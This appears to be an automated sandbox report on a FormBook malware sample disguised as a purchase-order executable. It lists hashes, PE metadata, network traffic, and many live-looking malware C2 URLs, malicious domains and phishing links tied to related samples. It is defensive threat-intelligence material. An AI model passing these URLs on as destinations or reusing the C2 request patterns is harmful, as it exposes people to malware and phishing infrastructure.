                                                                          • www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
                                                                          Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
                                                                          PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                                          • www.carfactsandfigures.com/gpc9/?pfD=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoQOkRQ9xiXX9HyxRaD3/mCeI&28=XrcXTyOAOYd9aU4
                                                                          Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                          • www.carfactsandfigures.com/gpc9/?Qw=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoWCpUiVji2f5FixRaDjUrieI&Cq=oXbgvbGl
                                                                          Zpe3AgLpIk.exeGet hashmaliciousFormBookBrowse
                                                                          • www.detail.tips/ug0e/?g3=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmn4WmFlEKCSmNHQ==&aRz=TnxvzmvvZHhQa
                                                                          cOqo5PZFXC.exeGet hashmaliciousFormBookBrowse
                                                                          • www.detail.tips/ug0e/?T6N6=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzfuiO2sKUmKBQ8Ki8GsnQXiV&a23=vQfnLmKSaoS
                                                                          qeUNNruKMS.exeGet hashmaliciousFormBookBrowse
                                                                          • www.detail.tips/ug0e/?xGgP0=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzYXgBkUxTDmNB8Ki8FQ2d3iV&Ck=YjGWWgtgIy

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.nesmalt.infoHSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.29.155.54
                                                                          HSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.29.155.54
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.29.155.54
                                                                          pPi18YXmEM.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.29.155.54
                                                                          TNT_Invoice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.29.155.54
                                                                          HSBC_Payment_Adice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.29.155.54
                                                                          SecuriteInfo.com.Win32.DropperX-gen.20545.21398.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 66.29.155.54
                                                                          www.makeinai.onlinePO_REGSEW4298.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.140.192.89
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.140.192.89
                                                                          PAYNOW_2023_08_002783pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.140.192.187
                                                                          rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.140.192.187
                                                                          www.611erhm.topHSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.149.198.43
                                                                          HSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.117.26.57
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.149.198.43
                                                                          pPi18YXmEM.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.149.198.43
                                                                          TNT_Invoice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.149.198.43
                                                                          HSBC_Payment_Adice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.117.26.57
                                                                          Order_ID_DHL_0901P55AL.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.149.198.43

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          SS-ASHUSHesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231128_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=04361/434/00D&dest=http://livingbythestream.com/css/style/hguh1k/bruna.hom@uvic.catGet hashmaliciousHTMLPhisherBrowse
                                                                          • 131.153.44.120
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 131.153.147.90
                                                                          file.exeGet hashmaliciousBazaLoaderBrowse
                                                                          • 131.153.152.122
                                                                          SecuriteInfo.com.Win32.TrojanX-gen.24405.26677.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.100.231
                                                                          https://drive.google.com/file/d/11qmYm6lCQxQsYSNvVMa92eUR4AcCAhCn/previewGet hashmaliciousUnknownBrowse
                                                                          • 198.24.171.52
                                                                          Quote#2310303384.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.100.231
                                                                          https://freefireenewgames.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 131.153.148.28
                                                                          https://freenetflixxaccontcom.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 23.235.251.211
                                                                          https://allezlens.fr/Get hashmaliciousUnknownBrowse
                                                                          • 131.153.148.26
                                                                          Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                          • 131.153.147.186
                                                                          Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                          • 131.153.147.186
                                                                          https://komposty.cz/.dps/index/myaccount/Get hashmaliciousUnknownBrowse
                                                                          • 131.153.242.59
                                                                          njvmboDs7W.exeGet hashmaliciousAmadey, Glupteba, RHADAMANTHYS, RedLineBrowse
                                                                          • 131.153.147.42
                                                                          temp.vbsGet hashmaliciousUnknownBrowse
                                                                          • 131.153.147.162
                                                                          https://pub-293ee7fa42274247834c50067ffbc67f.r2.dev/30zuth09clo23me.html#fcarron@amada.frGet hashmaliciousHTMLPhisherBrowse
                                                                          • 131.153.147.162
                                                                          TRANSIP-ASAmsterdamtheNetherlandsNLFpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 37.97.254.27
                                                                          Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.97.254.27
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.97.254.27
                                                                          PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                          • 37.97.254.27
                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                                          • 95.170.75.142
                                                                          Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 37.97.254.27
                                                                          ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                                          • 185.211.251.125
                                                                          F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                          • 37.97.214.109
                                                                          INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                          • 95.170.75.168
                                                                          NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.97.254.27
                                                                          003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 37.97.254.27
                                                                          Document.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                          • 95.170.75.197
                                                                          sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                          • 149.210.216.118
                                                                          RF_-_ORDER_8990387_REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                          • 86.105.245.69
                                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 149.210.216.117

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_CCTEB77.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1415
                                                                          Entropy (8bit):5.352427679901606
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                          MD5:97AD91F1C1F572C945DA12233082171D
                                                                          SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                          SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                          SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                          C:\Users\user\AppData\Local\Temp\7e327r58

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\isoburn.exe
                                                                          File Type:Unknown
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.382914605943906
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:PO_CCTEB77.exe
                                                                          File size:1'154'048 bytes
                                                                          MD5:7391f0c0a4cd63ecedef46dbb072542c
                                                                          SHA1:d48186b338445f25fc92c9aede867010be3c3b8f
                                                                          SHA256:5f409d66b5e4403f5c05ff19c88acd96d0ee3a0511c4ebca73abe01ced6eb5b6
                                                                          SHA512:582cc03750fa99361af605b4742a756354661effd900f6188bfa87997a9a06ed0c49e4d7f149393466f06d69d5a0cb89ceb76cec8c6203ff276f62af5915a9f1
                                                                          SSDEEP:24576:dMoF0IXV7bsXRvuARtoW7Q4JnGYfpBhtD/:y+7bGRvNRto+GY3
                                                                          TLSH:00358ED1F1948DDAE86F06F1BD2AA53011E37E9C54A4C10C5A99BB5B26F3342209FE1F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6de..............0..............*... ...@....@.. ....................................@................................

                                                                          File Icon

                                                                          Icon Hash:aea4accc16a3d9be

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x4d2aee
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x656436DC [Mon Nov 27 06:27:40 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd2a990x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x48af0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xd04cc0x54.text
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000xd0af40xd0c00False0.9010198353293413data7.829988304712993IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0xd40000x48af00x48c00False0.06330541237113402data4.770135185098519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x11e0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xd42e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                                          RT_ICON0xd49480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                                          RT_ICON0xd4c300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                                          RT_ICON0xd4d580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                                          RT_ICON0xd5c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                                          RT_ICON0xd64a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                                          RT_ICON0xd6a100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                                          RT_ICON0x118a380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                                          RT_ICON0x11afe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                                          RT_ICON0x11c0880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                                          RT_GROUP_ICON0x11c4f00x92data0.5753424657534246
                                                                          RT_VERSION0x11c5840x380data0.421875
                                                                          RT_MANIFEST0x11c9040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 2, 2023 18:47:34.478856087 CET4971680192.168.2.5162.222.226.77
                                                                          Dec 2, 2023 18:47:34.667927980 CET8049716162.222.226.77192.168.2.5
                                                                          Dec 2, 2023 18:47:34.668045998 CET4971680192.168.2.5162.222.226.77
                                                                          Dec 2, 2023 18:47:34.669131994 CET4971680192.168.2.5162.222.226.77
                                                                          Dec 2, 2023 18:47:34.858143091 CET8049716162.222.226.77192.168.2.5
                                                                          Dec 2, 2023 18:47:34.865154982 CET8049716162.222.226.77192.168.2.5
                                                                          Dec 2, 2023 18:47:34.865211964 CET8049716162.222.226.77192.168.2.5
                                                                          Dec 2, 2023 18:47:34.865331888 CET4971680192.168.2.5162.222.226.77
                                                                          Dec 2, 2023 18:47:34.866097927 CET4971680192.168.2.5162.222.226.77
                                                                          Dec 2, 2023 18:47:35.055109024 CET8049716162.222.226.77192.168.2.5
                                                                          Dec 2, 2023 18:47:45.077358961 CET4971780192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:45.214598894 CET804971774.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:45.214760065 CET4971780192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:45.215646982 CET4971780192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:45.352288961 CET804971774.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:45.362108946 CET804971774.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:45.362134933 CET804971774.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:45.362226963 CET4971780192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:46.726150990 CET4971780192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:47.742204905 CET4971880192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:47.876012087 CET804971874.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:47.876285076 CET4971880192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:47.876436949 CET4971880192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:48.010018110 CET804971874.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:48.015408993 CET804971874.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:48.015465975 CET804971874.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:48.015535116 CET4971880192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:49.382535934 CET4971880192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:50.403704882 CET4971980192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:50.540436029 CET804971974.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:50.540649891 CET4971980192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:50.540918112 CET4971980192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:50.678092003 CET804971974.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:50.678164005 CET804971974.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:50.681034088 CET804971974.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:50.681087971 CET804971974.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:50.681210041 CET4971980192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:52.054326057 CET4971980192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:53.070354939 CET4972080192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:53.206984043 CET804972074.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:53.207158089 CET4972080192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:53.207398891 CET4972080192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:53.343977928 CET804972074.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:53.348030090 CET804972074.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:53.348521948 CET804972074.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:53.348598957 CET4972080192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:53.348639965 CET4972080192.168.2.574.208.236.181
                                                                          Dec 2, 2023 18:47:53.485163927 CET804972074.208.236.181192.168.2.5
                                                                          Dec 2, 2023 18:47:58.505687952 CET4972180192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:47:58.635238886 CET8049721172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:47:58.635354042 CET4972180192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:47:58.638782978 CET4972180192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:47:58.768290043 CET8049721172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:00.148224115 CET4972180192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:00.278122902 CET8049721172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:00.278275967 CET4972180192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:01.707561970 CET4972280192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:01.836762905 CET8049722172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:01.836868048 CET4972280192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:01.837263107 CET4972280192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:01.966346025 CET8049722172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:03.351445913 CET4972280192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:03.480943918 CET8049722172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:03.481036901 CET4972280192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:04.367374897 CET4972380192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:04.496253014 CET8049723172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:04.496387959 CET4972380192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:04.496664047 CET4972380192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:04.625395060 CET8049723172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:04.625433922 CET8049723172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:06.007436037 CET4972380192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:06.138474941 CET8049723172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:06.138536930 CET4972380192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:07.023689985 CET4972580192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:07.153551102 CET8049725172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:07.153711081 CET4972580192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:07.153966904 CET4972580192.168.2.5172.67.184.73
                                                                          Dec 2, 2023 18:48:07.283734083 CET8049725172.67.184.73192.168.2.5
                                                                          Dec 2, 2023 18:48:37.802370071 CET8049725172.67.184.73192.168.2.5
